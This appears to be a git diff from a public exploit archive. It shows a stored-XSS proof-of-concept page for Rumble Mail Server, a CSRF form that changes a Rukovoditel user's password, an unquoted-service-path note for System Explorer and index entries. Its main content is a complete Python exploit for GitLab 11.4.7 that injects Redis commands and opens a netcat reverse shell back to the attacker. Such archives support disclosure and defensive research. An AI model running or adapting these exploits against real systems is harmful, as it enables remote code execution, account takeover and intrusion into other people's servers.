<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
</div>
</div>
<div id="contents">
<h1>RumbleLua users </h1>
<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
while regular users can only
see and edit the domains they have access to.
</p>
<table class="elements">
<tr>
<th>Create a new user:</th>
</tr>
<tr>
<td>
<form action="/users" method="post" name="makeuser">
<div style="width: 300px; text-align:right; float: left;">
<label for="username"><strong>Username:</strong></label>
<input name="username" autocomplete="off" type="text" id="username" >
<br>
<label for="password"><strong>Password:</strong></label>
<input type="password" autocomplete="off" name="password" id="password">
<br />
<label for="password"><strong>Access rights:</strong></label>
<select name="rights" size="4" style="width: 150px;" multiple="multiple">
<option value="*" style="color:#C33; font-weight:bold;">Full control</option>
<optgroup label="Domains:">
</optgroup>
</select>
</div>
<p><br /><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
&nbsp;&nbsp;
<input type="submit" name="submit" id="submit" value="Submit" />
</p>
</form>
</td>
</tr>
</table>
<table width="200" class="elements">
<tr>
<th>Username</th>
<th>Rights</th>
<th>Actions</th>
</tr>
<tr>
<td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
<td>Full control</td>
<td>
<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
</td>
</tr>
<tr>
<td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
<td>Full control</td>
<td>
<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
</td>
</tr>
<tr>
<td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
<td>Full control</td>
<td>
<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
</td>
</tr>
</table>
<p>&nbsp;</p>
</div>
<br />
<p align="center">
Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
</p>
</body>
</html>

30
exploits/php/webapps/49245.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change
password)
# Date: 2020-12-14
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# Tested on: Kali Linux
POC(localhost/index.php?module=users/change_password):
<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<form
action="https://localhost/index.php?module=users/change_password&action=change"
method="POST">
<input type="hidden" name="form&#95;session&#95;token"
value="D&#94;HUyTDh0X" />
<input type="hidden" name="password&#95;new" value="123456789" />
<input type="hidden" name="password&#95;confirmation"
value="123456789" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
--

64
exploits/ruby/webapps/49257.py Executable file
View file

@ -0,0 +1,64 @@
# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
# Date: 14-12-2020
# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
# Vendor Homepage: https://about.gitlab.com/
# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
# Tested On: Debian 10 + Apache/2.4.46 (Debian)
# Version: 11.4.7 community
import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path
# Sign in GitLab 11.4.7 portal and get (using Burp or something other):
# authenticity_token
# authenticated cookies
# username
# specify localport and localip for reverse shell
username='aaaaaaaaaaaa'
authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
localport='1234'
localip='192.168.0.114'
url = "http://192.168.0.130:5080"
proxies = { "http": "http://localhost:8080" }
def deb(str):
print("Debug => "+str)
def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
return {'utf8':'','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
import string
def random_string(length):
return ''.join(random.choice(string.ascii_letters) for m in range(length))
def init(username,cookie,authenticity_token,localport,localip):
from bs4 import BeautifulSoup
import re
import urllib.parse
deb("Token: "+authenticity_token)
deb("Cookie: "+cookie)
session=requests.Session()
headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
soup = BeautifulSoup(r.content,"lxml")
nsid = soup.findAll('input', {"id": "project_namespace_id"})
namespace_id=nsid[0]['value'];
deb("Namespace ID: "+namespace_id)
prgname=random_string(8)
newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
newpayload=urllib.parse.urlencode(newpayload)
deb("Payload encoded: "+newpayload)
r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
os.system("nc -nvlp "+localport)
init(username,cookie,authenticity_token,localport,localip)

29
exploits/windows/local/49248.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
# Date: 2020-10-14
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://systemexplorer.net/
# Software Link: http://systemexplorer.net/download/SystemExplorerSetup.exe
# Version: Version 7.0.0
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc SystemExplorerHelpService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SystemExplorerHelpService
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Explorer Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.

13
files_exploits.csv
View file

@ -11230,6 +11230,7 @@ id,file,description,date,author,type,platform,port
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows, 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple, 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows, 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43463,3 +43464,15 @@ id,file,description,date,author,type,platform,port
49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php, 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php, 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php, 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,
49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,
49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,
49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,
49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,

Can't render this file because it is too large.